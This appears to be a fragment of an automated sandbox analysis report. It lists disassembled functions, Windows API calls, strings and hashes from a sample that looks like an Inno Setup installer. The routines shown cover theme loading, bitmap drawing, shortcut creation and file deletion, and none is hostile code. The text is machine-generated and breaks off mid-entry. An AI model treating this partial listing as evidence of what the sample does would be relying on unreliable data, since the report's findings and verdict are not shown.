                                                                                            • Opcode Fuzzy Hash: b2ff140757208bd7b7cc33ac29151dbeb423d1cdddd3b288bc041a56f1810338
                                                                                            • Instruction Fuzzy Hash: 55E01AA070011087DB10AFAADCC8B9632A9BB48304F55017ABD49CF35BD63CC8608724
                                                                                            APIs
                                                                                            • NtdllDefWindowProc_A.USER32(?,?,?,?,00000000,004127D5), ref: 004127C3
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: NtdllProc_Window
                                                                                            • String ID:
                                                                                            • API String ID: 4255912815-0
                                                                                            • Opcode ID: 120c9c179850e2d77f2b5158c289480559fb4752f9becda92d3f5c4f199058c9
                                                                                            • Instruction ID: 2c049f03cfb376e3baa0368465928f91904f6d03483072bf0e6cb5f6a46bccc5
                                                                                            • Opcode Fuzzy Hash: 120c9c179850e2d77f2b5158c289480559fb4752f9becda92d3f5c4f199058c9
                                                                                            • Instruction Fuzzy Hash: 4A5102357082048FD710DB6ADA80A9BF3E5EF98314B2082BBD814C77A1D7B8AD91C75D
                                                                                            APIs
                                                                                            • NtdllDefWindowProc_A.USER32(?,?,?,?), ref: 00478C0E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: NtdllProc_Window
                                                                                            • String ID:
                                                                                            • API String ID: 4255912815-0
                                                                                            • Opcode ID: 35b14883da97521222dd4ba63ab43259808bc2fdd283b26f07d3c05bbd11cdae
                                                                                            • Instruction ID: 8fc52e73ba06cc46e730b07d7f7f94568764801a7b8f51cd1014d1f63996c257
                                                                                            • Opcode Fuzzy Hash: 35b14883da97521222dd4ba63ab43259808bc2fdd283b26f07d3c05bbd11cdae
                                                                                            • Instruction Fuzzy Hash: EC4148B5A44104DFCB10CF99C6888AAB7F5FB49310B64C99AF848DB701D738EE45DB58
                                                                                            APIs
                                                                                            • ArcFourCrypt._ISCRYPT(?,?,?,0046DEA4,?,?,0046DEA4,00000000), ref: 0045D247
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: CryptFour
                                                                                            • String ID:
                                                                                            • API String ID: 2153018856-0
                                                                                            • Opcode ID: 60613f318f2e56de1b1058283c26d55875caf569050bffc963c4b4a7e30f6a75
                                                                                            • Instruction ID: 5effe0378c810cd07e0217cdc1e7a72ed78fe315a0c34b067f2c35eeb24cdbba
                                                                                            • Opcode Fuzzy Hash: 60613f318f2e56de1b1058283c26d55875caf569050bffc963c4b4a7e30f6a75
                                                                                            • Instruction Fuzzy Hash: D0C09BF200420CBF650057D5ECC9C77B75CE6586547408126F7048210195726C104574
                                                                                            APIs
                                                                                            • ArcFourCrypt._ISCRYPT(?,00000000,00000000,000003E8,0046DB14,?,0046DCF5), ref: 0045D25A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: CryptFour
                                                                                            • String ID:
                                                                                            • API String ID: 2153018856-0
                                                                                            • Opcode ID: d774fb8793e7b9215c4f3788321c424c537fe54849dfeb2a35b58218e4d2cefe
                                                                                            • Instruction ID: 17600df93846144bfd8e61cd07b91608ca2a028cf3222f5d1774599e6ed580aa
                                                                                            • Opcode Fuzzy Hash: d774fb8793e7b9215c4f3788321c424c537fe54849dfeb2a35b58218e4d2cefe
                                                                                            • Instruction Fuzzy Hash: B7A002F0B80300BAFD2057F15E5EF26252C97D0F01F2084657306E90D085A56400853C
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2737653267.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2737498721.0000000010000000.00000002.00000001.01000000.00000007.sdmp
                                                                                            • Associated: 00000001.00000002.2737869507.0000000010002000.00000002.00000001.01000000.00000007.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_10000000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 550b9f88123d0c3b213a5d4b99e682963a3eaac5120c60ac7846f9a0f3bba5ba
                                                                                            • Instruction ID: 1c94840b05858ddf3503627acbaac9226f9c4a6e1659969bf0a936c2f155f8a0
                                                                                            • Opcode Fuzzy Hash: 550b9f88123d0c3b213a5d4b99e682963a3eaac5120c60ac7846f9a0f3bba5ba
                                                                                            • Instruction Fuzzy Hash: FF11303254D3D28FC305CF2894506D6FFE4AF6A640F194AAEE1D45B203C2659549C7A2
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2737653267.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2737498721.0000000010000000.00000002.00000001.01000000.00000007.sdmp
                                                                                            • Associated: 00000001.00000002.2737869507.0000000010002000.00000002.00000001.01000000.00000007.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_10000000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: aff350dcda9d135b5489d453054620cf61adfe11cc5af5bb48cdce25d513e1a9
                                                                                            • Instruction ID: 837d35c9df4effc004866add7a9100bdfed479f04b3922bb4bd4c5469ecd81ba
                                                                                            • Opcode Fuzzy Hash: aff350dcda9d135b5489d453054620cf61adfe11cc5af5bb48cdce25d513e1a9
                                                                                            • Instruction Fuzzy Hash:
                                                                                            APIs
                                                                                              • Part of subcall function 0044B604: GetVersionExA.KERNEL32(00000094), ref: 0044B621
                                                                                            • LoadLibraryA.KERNEL32(uxtheme.dll,?,0044F775,00498BF2), ref: 0044B67F
                                                                                            • GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 0044B697
                                                                                            • GetProcAddress.KERNEL32(00000000,CloseThemeData), ref: 0044B6A9
                                                                                            • GetProcAddress.KERNEL32(00000000,DrawThemeBackground), ref: 0044B6BB
                                                                                            • GetProcAddress.KERNEL32(00000000,DrawThemeText), ref: 0044B6CD
                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044B6DF
                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044B6F1
                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemePartSize), ref: 0044B703
                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeTextExtent), ref: 0044B715
                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeTextMetrics), ref: 0044B727
                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundRegion), ref: 0044B739
                                                                                            • GetProcAddress.KERNEL32(00000000,HitTestThemeBackground), ref: 0044B74B
                                                                                            • GetProcAddress.KERNEL32(00000000,DrawThemeEdge), ref: 0044B75D
                                                                                            • GetProcAddress.KERNEL32(00000000,DrawThemeIcon), ref: 0044B76F
                                                                                            • GetProcAddress.KERNEL32(00000000,IsThemePartDefined), ref: 0044B781
                                                                                            • GetProcAddress.KERNEL32(00000000,IsThemeBackgroundPartiallyTransparent), ref: 0044B793
                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeColor), ref: 0044B7A5
                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeMetric), ref: 0044B7B7
                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeString), ref: 0044B7C9
                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeBool), ref: 0044B7DB
                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeInt), ref: 0044B7ED
                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeEnumValue), ref: 0044B7FF
                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemePosition), ref: 0044B811
                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeFont), ref: 0044B823
                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeRect), ref: 0044B835
                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeMargins), ref: 0044B847
                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeIntList), ref: 0044B859
                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemePropertyOrigin), ref: 0044B86B
                                                                                            • GetProcAddress.KERNEL32(00000000,SetWindowTheme), ref: 0044B87D
                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeFilename), ref: 0044B88F
                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeSysColor), ref: 0044B8A1
                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeSysColorBrush), ref: 0044B8B3
                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeSysBool), ref: 0044B8C5
                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeSysSize), ref: 0044B8D7
                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeSysFont), ref: 0044B8E9
                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeSysString), ref: 0044B8FB
                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeSysInt), ref: 0044B90D
                                                                                            • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0044B91F
                                                                                            • GetProcAddress.KERNEL32(00000000,IsAppThemed), ref: 0044B931
                                                                                            • GetProcAddress.KERNEL32(00000000,GetWindowTheme), ref: 0044B943
                                                                                            • GetProcAddress.KERNEL32(00000000,EnableThemeDialogTexture), ref: 0044B955
                                                                                            • GetProcAddress.KERNEL32(00000000,IsThemeDialogTextureEnabled), ref: 0044B967
                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeAppProperties), ref: 0044B979
                                                                                            • GetProcAddress.KERNEL32(00000000,SetThemeAppProperties), ref: 0044B98B
                                                                                            • GetProcAddress.KERNEL32(00000000,GetCurrentThemeName), ref: 0044B99D
                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeDocumentationProperty), ref: 0044B9AF
                                                                                            • GetProcAddress.KERNEL32(00000000,DrawThemeParentBackground), ref: 0044B9C1
                                                                                            • GetProcAddress.KERNEL32(00000000,EnableTheming), ref: 0044B9D3
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressProc$LibraryLoadVersion
                                                                                            • String ID: CloseThemeData$DrawThemeBackground$DrawThemeEdge$DrawThemeIcon$DrawThemeParentBackground$DrawThemeText$EnableThemeDialogTexture$EnableTheming$GetCurrentThemeName$GetThemeAppProperties$GetThemeBackgroundContentRect$GetThemeBackgroundRegion$GetThemeBool$GetThemeColor$GetThemeDocumentationProperty$GetThemeEnumValue$GetThemeFilename$GetThemeFont$GetThemeInt$GetThemeIntList$GetThemeMargins$GetThemeMetric$GetThemePartSize$GetThemePosition$GetThemePropertyOrigin$GetThemeRect$GetThemeString$GetThemeSysBool$GetThemeSysColor$GetThemeSysColorBrush$GetThemeSysFont$GetThemeSysInt$GetThemeSysSize$GetThemeSysString$GetThemeTextExtent$GetThemeTextMetrics$GetWindowTheme$HitTestThemeBackground$IsAppThemed$IsThemeActive$IsThemeBackgroundPartiallyTransparent$IsThemeDialogTextureEnabled$IsThemePartDefined$OpenThemeData$SetThemeAppProperties$SetWindowTheme$uxtheme.dll
                                                                                            • API String ID: 1968650500-2910565190
                                                                                            • Opcode ID: 4248c38413e99d9464b79edb7fe9b1fdc4fa56b35b8262d24df0eec612bb70b6
                                                                                            • Instruction ID: e93aa9000a3b975727f71862fff1c9a8a52c50bca2d3d110ef64c9f3a3b13d35
                                                                                            • Opcode Fuzzy Hash: 4248c38413e99d9464b79edb7fe9b1fdc4fa56b35b8262d24df0eec612bb70b6
                                                                                            • Instruction Fuzzy Hash: D391A8F0A40B11ABEB00EFB5AD96A2A3BA8EB15714310067BB454DF295D778DC108FDD
                                                                                            APIs
                                                                                            • GetDC.USER32(00000000), ref: 0041CA40
                                                                                            • CreateCompatibleDC.GDI32(?), ref: 0041CA4C
                                                                                            • CreateBitmap.GDI32(0041A944,?,00000001,00000001,00000000), ref: 0041CA70
                                                                                            • CreateCompatibleBitmap.GDI32(?,0041A944,?), ref: 0041CA80
                                                                                            • SelectObject.GDI32(0041CE3C,00000000), ref: 0041CA9B
                                                                                            • FillRect.USER32(0041CE3C,?,?), ref: 0041CAD6
                                                                                            • SetTextColor.GDI32(0041CE3C,00000000), ref: 0041CAEB
                                                                                            • SetBkColor.GDI32(0041CE3C,00000000), ref: 0041CB02
                                                                                            • PatBlt.GDI32(0041CE3C,00000000,00000000,0041A944,?,00FF0062), ref: 0041CB18
                                                                                            • CreateCompatibleDC.GDI32(?), ref: 0041CB2B
                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 0041CB5C
                                                                                            • SelectPalette.GDI32(00000000,00000000,00000001), ref: 0041CB74
                                                                                            • RealizePalette.GDI32(00000000), ref: 0041CB7D
                                                                                            • SelectPalette.GDI32(0041CE3C,00000000,00000001), ref: 0041CB8C
                                                                                            • RealizePalette.GDI32(0041CE3C), ref: 0041CB95
                                                                                            • SetTextColor.GDI32(00000000,00000000), ref: 0041CBAE
                                                                                            • SetBkColor.GDI32(00000000,00000000), ref: 0041CBC5
                                                                                            • BitBlt.GDI32(0041CE3C,00000000,00000000,0041A944,?,00000000,00000000,00000000,00CC0020), ref: 0041CBE1
                                                                                            • SelectObject.GDI32(00000000,?), ref: 0041CBEE
                                                                                            • DeleteDC.GDI32(00000000), ref: 0041CC04
                                                                                              • Part of subcall function 0041A058: GetSysColor.USER32(?), ref: 0041A062
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: ColorSelect$CreatePalette$CompatibleObject$BitmapRealizeText$DeleteFillRect
                                                                                            • String ID:
                                                                                            • API String ID: 269503290-0
                                                                                            • Opcode ID: 8288b1a004c19d08e53adfd80f36b756ff19622159534b91a17c952f52f31838
                                                                                            • Instruction ID: 91afdf38925dfcc0a19aef53af63d8b93a06df8cfedaf367688fa0d34ebdb442
                                                                                            • Opcode Fuzzy Hash: 8288b1a004c19d08e53adfd80f36b756ff19622159534b91a17c952f52f31838
                                                                                            • Instruction Fuzzy Hash: 01610071A44648AFDF10EBE9DC86FDFB7B8EB48704F10446AB504E7281D67CA940CB68
                                                                                            APIs
                                                                                            • CoCreateInstance.OLE32(00499A74,00000000,00000001,00499774,?,00000000,004569E3), ref: 0045667E
                                                                                            • CoCreateInstance.OLE32(00499764,00000000,00000001,00499774,?,00000000,004569E3), ref: 004566A4
                                                                                            • SysFreeString.OLEAUT32(00000000), ref: 0045685B
                                                                                            Strings
                                                                                            • %ProgramFiles(x86)%\, xrefs: 0045672E
                                                                                            • IShellLink::QueryInterface(IID_IPersistFile), xrefs: 00456904
                                                                                            • IPersistFile::Save, xrefs: 00456962
                                                                                            • IPropertyStore::SetValue(PKEY_AppUserModel_ExcludeFromShowInNewInstall), xrefs: 00456892
                                                                                            • IPropertyStore::SetValue(PKEY_AppUserModel_ID), xrefs: 00456840
                                                                                            • IPropertyStore::SetValue(PKEY_AppUserModel_PreventPinning), xrefs: 004567F1
                                                                                            • IShellLink::QueryInterface(IID_IPropertyStore), xrefs: 004567BD
                                                                                            • {pf32}\, xrefs: 0045671E
                                                                                            • CoCreateInstance, xrefs: 004566AF
                                                                                            • IPropertyStore::SetValue(PKEY_AppUserModel_StartPinOption), xrefs: 004568CA
                                                                                            • IPropertyStore::Commit, xrefs: 004568E3
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateInstance$FreeString
                                                                                            • String ID: %ProgramFiles(x86)%\$CoCreateInstance$IPersistFile::Save$IPropertyStore::Commit$IPropertyStore::SetValue(PKEY_AppUserModel_ExcludeFromShowInNewInstall)$IPropertyStore::SetValue(PKEY_AppUserModel_ID)$IPropertyStore::SetValue(PKEY_AppUserModel_PreventPinning)$IPropertyStore::SetValue(PKEY_AppUserModel_StartPinOption)$IShellLink::QueryInterface(IID_IPersistFile)$IShellLink::QueryInterface(IID_IPropertyStore)${pf32}\
                                                                                            • API String ID: 308859552-2363233914
                                                                                            • Opcode ID: 26ac11ebc8d2bbba6934e2b7da4071208c956f88b3f37f3572524cf0602978ca
                                                                                            • Instruction ID: 2d3acbfbfe5134b3b68b6dcde43dfe431d970b0eaffbfac770a5f5266a6492d0
                                                                                            • Opcode Fuzzy Hash: 26ac11ebc8d2bbba6934e2b7da4071208c956f88b3f37f3572524cf0602978ca
                                                                                            • Instruction Fuzzy Hash: 39B13170A00104AFDB50DFA9C845B9E7BF8AF09706F5540AAF804E7362DB78DD48CB69
                                                                                            APIs
                                                                                            • ShowWindow.USER32(?,00000005,00000000,00498768,?,?,00000000,?,00000000,00000000,?,00498B1F,00000000,00498B29,?,00000000), ref: 00498453
                                                                                            • CreateMutexA.KERNEL32(00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00498768,?,?,00000000,?,00000000,00000000,?,00498B1F,00000000), ref: 00498466
                                                                                            • ShowWindow.USER32(?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00498768,?,?,00000000,?,00000000,00000000), ref: 00498476
                                                                                            • MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 00498497
                                                                                            • ShowWindow.USER32(?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00498768,?,?,00000000,?,00000000), ref: 004984A7
                                                                                              • Part of subcall function 0042D44C: GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,0042D4DA,?,?,?,00000001,?,0045607E,00000000,004560E6), ref: 0042D481
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: ShowWindow$CreateFileModuleMultipleMutexNameObjectsWait
                                                                                            • String ID: .lst$.msg$/REG$/REGU$Inno-Setup-RegSvr-Mutex$Setup
                                                                                            • API String ID: 2000705611-3672972446
                                                                                            • Opcode ID: d895cb7c5264c7428a24ad32bd1f4b93e6c699b182eb53adebeee5f7002e5ba1
                                                                                            • Instruction ID: 1a66146e65e487955493167600903b91e60bc3637ed1504a34615a6495e02ea1
                                                                                            • Opcode Fuzzy Hash: d895cb7c5264c7428a24ad32bd1f4b93e6c699b182eb53adebeee5f7002e5ba1
                                                                                            • Instruction Fuzzy Hash: 5191A434A042049FDF11EBA9DC52BAE7BE5EF4A304F5144BBF500AB692DE7C9C05CA19
                                                                                            APIs
                                                                                            • GetLastError.KERNEL32(00000000,0045A994,?,?,?,?,?,00000006,?,00000000,0049785D,?,00000000,00497900), ref: 0045A846
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLast
                                                                                            • String ID: .chm$.chw$.fts$.gid$.hlp$.lnk$Deleting file: %s$Failed to delete the file; it may be in use (%d).$Failed to strip read-only attribute.$Stripped read-only attribute.$The file appears to be in use (%d). Will delete on restart.
                                                                                            • API String ID: 1452528299-3112430753
                                                                                            • Opcode ID: 41204ac3778d0b79d3de2409b6c45a5b2ad533d11cb42b90e75a22724f80c331
                                                                                            • Instruction ID: 43962401d403c06de7b31dde6fd87328655f81364e16ca473e433d379c6e1912
                                                                                            • Opcode Fuzzy Hash: 41204ac3778d0b79d3de2409b6c45a5b2ad533d11cb42b90e75a22724f80c331
                                                                                            • Instruction Fuzzy Hash: EC719070B002545BCB00EB6998417AE77A49F4931AF91896BFC01AB383DB7C9E1DC75E
                                                                                            APIs
                                                                                            • GetVersion.KERNEL32 ref: 0045CBDA
                                                                                            • GetModuleHandleA.KERNEL32(advapi32.dll), ref: 0045CBFA
                                                                                            • GetProcAddress.KERNEL32(00000000,GetNamedSecurityInfoW), ref: 0045CC07
                                                                                            • GetProcAddress.KERNEL32(00000000,SetNamedSecurityInfoW), ref: 0045CC14
                                                                                            • GetProcAddress.KERNEL32(00000000,SetEntriesInAclW), ref: 0045CC22
                                                                                              • Part of subcall function 0045CAC8: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,0045CB67,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0045CB41
                                                                                            • AllocateAndInitializeSid.ADVAPI32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,0045CE15,?,?,00000000), ref: 0045CCDB
                                                                                            • GetLastError.KERNEL32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,0045CE15,?,?,00000000), ref: 0045CCE4
                                                                                            Strings
                                                                                            Similarity
                                                                                            • API ID: AddressProc$AllocateByteCharErrorHandleInitializeLastModuleMultiVersionWide
                                                                                            • String ID: GetNamedSecurityInfoW$SetEntriesInAclW$SetNamedSecurityInfoW$W$advapi32.dll
                                                                                            • API String ID: 59345061-4263478283
                                                                                            • Opcode ID: a232fc9af4861a9c5d561c4cdd8364b97c4fb44f2e207c549b4316288fabcd11
                                                                                            • Instruction ID: 99773ef8a3d0261052733c4904a47669a242c0659fe16ead1f438c4abb71ff4e
                                                                                            • Opcode Fuzzy Hash: a232fc9af4861a9c5d561c4cdd8364b97c4fb44f2e207c549b4316288fabcd11
                                                                                            • Instruction Fuzzy Hash: BD518471900308EFDB10DF99C881BEEBBB8EB48711F14806AF904E7241C678A945CFA9
                                                                                            APIs
                                                                                            • CreateCompatibleDC.GDI32(00000000), ref: 0041B3C3
                                                                                            • CreateCompatibleDC.GDI32(00000000), ref: 0041B3CD
                                                                                            • GetObjectA.GDI32(?,00000018,00000004), ref: 0041B3DF
                                                                                            • CreateBitmap.GDI32(0000000B,?,00000001,00000001,00000000), ref: 0041B3F6
                                                                                            • GetDC.USER32(00000000), ref: 0041B402
                                                                                            • CreateCompatibleBitmap.GDI32(00000000,0000000B,?), ref: 0041B42F
                                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 0041B455
                                                                                            • SelectObject.GDI32(00000000,?), ref: 0041B470
                                                                                            • SelectObject.GDI32(?,00000000), ref: 0041B47F
                                                                                            • StretchBlt.GDI32(?,00000000,00000000,0000000B,?,00000000,00000000,00000000,?,?,00CC0020), ref: 0041B4AB
                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 0041B4B9
                                                                                            • SelectObject.GDI32(?,00000000), ref: 0041B4C7
                                                                                            • DeleteDC.GDI32(00000000), ref: 0041B4D0
                                                                                            • DeleteDC.GDI32(?), ref: 0041B4D9
                                                                                            Similarity
                                                                                            • API ID: Object$CreateSelect$Compatible$BitmapDelete$ReleaseStretch
                                                                                            • String ID:
                                                                                            • API String ID: 644427674-0
                                                                                            • Opcode ID: 9212dc48eb065078ffd6e64a0fe4b3e7e755c3ed7e1f96497366cc94fc87ddf9
                                                                                            • Instruction ID: 0f3e5998203d07172116f12fa3fedaa120d09cd030f2870c51d139f455c41937
